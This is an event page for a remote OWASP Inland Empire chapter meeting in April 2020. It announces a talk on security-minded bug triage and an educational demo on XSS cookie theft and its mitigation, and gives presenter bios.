Monthly Meeting (Remote)

Name: Monthly Meeting (Remote)
Start: 2020-04-10T18:00:00-07:00
End: 2020-04-10T21:00:00-07:00

Hosted by Brett G. and Alex .

OWASP Inland Empire - Open Web Application Security Project

Details

Hey all, this month we will be trying something a little different. Our Monthly Meeting will be done Remotely (Via Zoom) please make sure you RSVP. A link will be sent out to those that RSVP as we get closer to the meeting time.

Topic: When Is A Bug Not A Bug??

This topic helps guide people from a Dev & QA troubleshooting mindset into a Security investigation mindset. There are
times where the two approaches overlap and times where they diverge; knowing when to branch in which direction is
an important real-world skill. That branching is largely informed by Impact.

Presenter: Francisco Slavin

Francisco got started building secure systems in the cross-domain government world and then went into the broader world of Vulnerability Management and AppSec while working at Rapid7. He built the consulting practice, training, and product cert for AppSpider, got looped into some marketing and then ran away to live on a mountain in New Zealand and learn to paraglide for a while. Most recently he lived as a freelance consultant coaching teams on how to repeatedly and reliably implement best practices and beyond. He is now the Director of Product Security (DPS) for the Data & Insights division of Tyler Technologies and is very happy that he was able to backronym his job title to match an old videogame acronym.

Topic: Using XSS to Steal Cookies

Attention: This talk is for educational purposes only!
In this live demonstration, you will learn what a "cookie" is in regards to web browsing and some basic authentication. You will also learn some high-level principles of cross-site scripting aka XSS and how said "cookies" can be stolen via XSS. And lastly, you will learn a few ways to mitigate these types of attacks.

Presenter:
Dant35An0nym0u5
From notepad to Dreamweaver to Flash to the CMS, this failed web developer turned hacker back in the early 2000’s. It wasn’t until his own apps began getting hacked that he turned to application security and never looked back. A man of many hats, mostly white, he is currently a Security Advisor for Rapid7’s Managed AppSec team. Before joining Rapid7, he was a freelance web application penetration tester and if you go back even further, you may have seen him in a Halo tournament or two. https://github.com/nodisassemble

Monthly Meeting (Remote)

OWASP Inland Empire - Open Web Application Security Project

Details

You may also like